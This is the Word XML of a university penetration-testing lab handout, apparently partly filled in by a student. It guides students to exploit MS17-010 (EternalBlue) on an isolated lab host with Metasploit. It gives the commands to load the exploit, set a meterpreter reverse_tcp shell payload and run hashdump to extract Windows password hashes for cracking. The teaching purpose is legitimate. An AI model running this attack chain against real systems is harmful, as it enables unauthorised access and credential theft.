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F512E" w14:textId="10BAA28F" w:rsidR="003F5624" w:rsidRDefault="003F5624" w:rsidP="003F5624">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CYBR430, Penetration Test</w:t>
      </w:r>
      <w:r w:rsidR="00AB13BD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ing and Incident Response</w:t>
      </w:r>
      <w:r w:rsidR="00AB13BD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
        <w:t>Week 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab – </w:t>
      </w:r>
      <w:r w:rsidR="00AB13BD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cracking Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA014A" w14:textId="77777777" w:rsidR="003F5624" w:rsidRDefault="003F5624" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A705AD5" w14:textId="77777777" w:rsidR="005D427E" w:rsidRDefault="00346543" w:rsidP="003F5624">
      <w:r>
        <w:t xml:space="preserve">We now have quite a bit of information about our target network.  We know the IP addresses of the systems, </w:t>
      </w:r>
      <w:r w:rsidR="009735C5">
        <w:t xml:space="preserve">we have a pretty good idea of which operating systems are present, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we have </w:t>
      </w:r>
      <w:r w:rsidR="009735C5">
        <w:t xml:space="preserve">the names of </w:t>
      </w:r>
      <w:r>
        <w:t>some sha</w:t>
      </w:r>
      <w:r w:rsidR="009735C5">
        <w:t>res</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and we know some of the vulnerabilities which exist.  </w:t>
      </w:r>
      <w:r w:rsidR="009735C5">
        <w:t>We even have some usernames which were gained through the system enumeration but we don’t yet have passwords.  That is our next task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73598D65" w14:textId="77777777" w:rsidR="009735C5" w:rsidRDefault="009735C5" w:rsidP="003F5624">
      <w:r>
        <w:t>Through our vulnerability scans we learned the host at 10.19.99.10 has the vulnerability known as Microsoft Windows SMB Server Multiple Vulnerabilities.  It is also known as MS17-010 and has CVEs 2017-0143, 144, 145, 146, 147 &amp; 148.  This is a major vulnerability.  It carries a CVSS of 10 and could allow us a great deal of access to the host. The goal of this lab will be to harvest the credentials present on the 10.19.99.10 host.  We will do this by exploiting the MS17-010 vulnerability using a tool called Metasploit, extract the hashed credentials from the windows SAM file, and decrypt them using the tool john.  Lots to do so let’s get started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D924ABC" w14:textId="62FAFB59" w:rsidR="009735C5" w:rsidRDefault="009735C5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>When you did your initial scans everyone in the class scanned the same set of HAL hosts.  For this lab you will have your own copy of the host at 10.19.99.10 to ex</w:t>
      </w:r>
      <w:r w:rsidR="00E36FB2">
        <w:t xml:space="preserve">ploit.  </w:t>
      </w:r>
      <w:r w:rsidR="00E36FB2" w:rsidRPr="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Your new target machine will have the IP address 10.19.99.1nn.  The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E36FB2" w:rsidRPr="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E36FB2" w:rsidRPr="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> is the number of your Kali vm which is at the top of your vm window.  In the clip below the</w:t>
      </w:r>
      <w:r w:rsidR="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> example</w:t>
      </w:r>
      <w:r w:rsidR="00E36FB2" w:rsidRPr="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali vm number is 34.  The IP address of the target</w:t>
      </w:r>
      <w:r w:rsidR="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> in this example would</w:t>
      </w:r>
      <w:r w:rsidR="00E36FB2" w:rsidRPr="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> be 10.19.99.134.</w:t>
      </w:r>
      <w:r w:rsidR="00E36FB2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  Your target’s IP will be different!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51897666" w14:textId="45871449" w:rsidR="003B3643" w:rsidRDefault="003B3643" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>My IP is 10.19.99.112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0049EFA2" w14:textId="77777777" w:rsidR="00E36FB2" w:rsidRDefault="00E36FB2" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34ED1694" wp14:editId="0687EDA2">
            <wp:extent cx="5943600" cy="1659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ali_nu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1659255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7ACB75" w14:textId="77777777" w:rsidR="00E36FB2" w:rsidRDefault="00E36FB2" w:rsidP="003F5624">
      <w:r>
        <w:t xml:space="preserve">Now that </w:t>
      </w:r>
      <w:r w:rsidR="00CB075C">
        <w:t xml:space="preserve">you know your target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB075C">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB075C">
        <w:t xml:space="preserve"> we can move on to our next task which we will do through Metasploit.  The Metasploit framework provides a common structure from which to launch various exploits and their associated payloads.  In addition to launching exploits others have written you can write your own exploits and payloads.  To start Metasploit use the ‘Applications’ menu, select the ‘Exploitation Tools’ menu, and select Metasploit.  The first time you use Metasploit it will initialize its database which may take a few minutes.  Once that is complete it will complete loading and present you with a random piece ACSII art.  Your screen will differ from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CB075C">
        <w:t>below</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CB075C">
        <w:t xml:space="preserve"> but your last line should be a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB075C">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB075C">
        <w:t>&gt; prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC046D" w14:textId="77777777" w:rsidR="00CB075C" w:rsidRDefault="00CB075C" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B4065E" wp14:editId="40650590">
            <wp:extent cx="5943600" cy="41770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f_star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177030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A27EF2" w14:textId="77777777" w:rsidR="00CB075C" w:rsidRDefault="00CB075C" w:rsidP="003F5624">
      <w:r>
        <w:t xml:space="preserve">Normally your next step would be to issue the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>msfupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to update the database and associated exploits.  As the toxic pool is not connected to the internet you will skip this step.  Metasploit was updated when the Kali vm was built.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FECF058" w14:textId="77777777" w:rsidR="00CB075C" w:rsidRDefault="00CB075C" w:rsidP="003F5624">
      <w:r>
        <w:t>Next we will see if Metasploit has an exploit for the MS17-010 vulnerability we found on our target host.  Enter the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD1F10" w14:textId="77777777" w:rsidR="00CB075C" w:rsidRDefault="00AC3915" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>search MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D5A0A" w14:textId="77777777" w:rsidR="00AC3915" w:rsidRDefault="00AC3915" w:rsidP="003F5624">
      <w:r>
        <w:t xml:space="preserve">We are rewarded with a list of the available exploits.  In addition to the name of the exploit and a description of what it does you will see a ranking of potential of success.  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metaploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ranks exploits from lowest to highest as: manual, low, average, normal, good, great, excellent.</w:t>
      </w:r>
      <w:r w:rsidR="002B74DA">
        <w:t xml:space="preserve">  Keep in mind an exploit may not always be successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E41870" w14:textId="77777777" w:rsidR="00AC3915" w:rsidRDefault="00AC3915" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E932EBD" wp14:editId="6F750929">
            <wp:extent cx="5943600" cy="1493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sf_search.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493520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A3C42" w14:textId="77777777" w:rsidR="00AC3915" w:rsidRDefault="00AC3915" w:rsidP="003F5624">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We will be using the second listed exploit.  To load the exploit issue the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command with the name of the desired exploit.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643672F6" w14:textId="77777777" w:rsidR="00AC3915" w:rsidRDefault="00AC3915" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E5300B" w14:textId="77777777" w:rsidR="00AC3915" w:rsidRDefault="00AC3915" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77ED5783" wp14:editId="674332E6">
            <wp:extent cx="5943600" cy="1819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sf_us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4E70E652" w14:textId="77777777" w:rsidR="00AC3915" w:rsidRDefault="00AC3915" w:rsidP="003F5624">
      <w:r>
        <w:t xml:space="preserve">Now that we have loaded the exploit we need to set the payload.  Payloads can do any number of tasks such as open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vnc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sessions or launch a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell on the target system.  The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell launches in the target’s memory so no record is left on the systems drives.  The shell provides access to the host to do any number of additional activities.  </w:t>
      </w:r>
      <w:r w:rsidR="002B74DA">
        <w:t>Our first step is to see what payloads are available with this exploit.  To do that enter the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40A6D6" w14:textId="77777777" w:rsidR="002B74DA" w:rsidRDefault="002B74DA" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D51C9" w14:textId="77777777" w:rsidR="002B74DA" w:rsidRDefault="002B74DA" w:rsidP="003F5624">
      <w:r>
        <w:t xml:space="preserve">You will see a pretty extensive list of potential payloads.  We are interested in the one which will launch a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell.  We’ve already talked about the shell but you will note many of the payloads have two sets of variations, one which says bind and one which says </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  These are two different types of connections.  With the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bind the payload is loaded on the target system and it waits for you to make a connection to it.  With the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> variant the payload is delivered and the target starts a connection back to your system.  The command to set the payload is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C475108" w14:textId="77777777" w:rsidR="002B74DA" w:rsidRDefault="002B74DA" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46FC5E8C" w14:textId="77777777" w:rsidR="002B74DA" w:rsidRDefault="002B74DA" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18049A91" wp14:editId="03AA6D91">
            <wp:extent cx="5943600" cy="7962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sf_setpayloa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96290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC3F501" w14:textId="77777777" w:rsidR="002B74DA" w:rsidRDefault="002B74DA" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each payload may have options which need to be set to specify how the payload will act.  To see what options are available use the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B0088" w14:textId="77777777" w:rsidR="002B74DA" w:rsidRDefault="002B74DA" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17701ABB" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C3A12B1" wp14:editId="1AEBE0ED">
            <wp:extent cx="5943600" cy="351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sf_se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42BE29B0" w14:textId="77777777" w:rsidR="002B74DA" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:r>
        <w:t>Options are shown as required</w:t>
      </w:r>
      <w:r w:rsidR="002B74DA">
        <w:t xml:space="preserve"> or optional.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  This payload has two required</w:t>
      </w:r>
      <w:r w:rsidR="002B74DA">
        <w:t xml:space="preserve"> options which have not yet been set, RHOST (remote host, the IP of your target) and LHOST (local host, your IP).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Issue the following two commands, providing your specific target and Kali IP.  Remember you determined your target’s IP at the beginning of the lab and you can find your IP by using the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in a terminal window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14520FCB" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>set RHOST &lt;your target IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B34A3D5" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>set LHOST &lt;your IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DE7FD" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:r>
        <w:t xml:space="preserve">To make sure you have set LHOST and RHOST correctly use the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239A4F0" w14:textId="0A47650D" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Paste a screen dump of your options screen showing RHOST and LHOST set for your target and kali vm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC5BEB" w14:textId="5874D38C" w:rsidR="00CF25F6" w:rsidRDefault="00CF25F6" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D0E643E" wp14:editId="554BCFEE">
            <wp:extent cx="5943600" cy="1228725"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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1228725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E485E4" w14:textId="1DF1421D" w:rsidR="00CF25F6" w:rsidRDefault="00CF25F6" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B82148C" w14:textId="585B19AC" w:rsidR="00CF25F6" w:rsidRDefault="00CF25F6" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F4BB05" w14:textId="7CB778FE" w:rsidR="00CF25F6" w:rsidRDefault="00CF25F6" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A9A1BC" w14:textId="77777777" w:rsidR="00CF25F6" w:rsidRDefault="00CF25F6" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78793E5C" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We have now specified the exploit, the payload, and set the payload options.  It’s now time to launch our attack.  Issue the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A51F3" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06B1DE" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6620A8A8" wp14:editId="0DF31697">
            <wp:extent cx="5943600" cy="35883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sf_exploi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88385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE25C46" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The command may take a while to execute.  You can monitor its progress through the onscreen messages as it exploits the vulnerability we found earlier.  Your hope is that the exploit will eventually be successful and you will be rewarded with a WIN and a shell prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFAE655" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="009312D5" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B6655D" wp14:editId="0D5B77B5">
            <wp:extent cx="5943600" cy="32531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sf_w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0763434B" w14:textId="77777777" w:rsidR="009312D5" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">There are many activities we could do from here but our goal is to dump the user credentials on this system.  Windows passwords are stored locally in the SAM file.  Windows locks this file so that it cannot be accessed by any user while the system is running.  One way to copy the file is get physical access to the computer and boot it to a live CD or external drive and then mount the system drive.  The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell allows us a way to do this remotely through the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">.  Issue that command at your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061943D4" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124BDC9B" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090C02D8" wp14:editId="2CD5D2C4">
            <wp:extent cx="5943600" cy="6788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sf_hashdum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78815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="035AEFD1" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>What you are provide with is a list of users and their hashed password. Yours will be different than the above. We need to copy this information and use the program john to try and crack the passwords.  Highlight the user/hash information and copy it to your clipboard.</w:t>
      </w:r>
    </w:p>
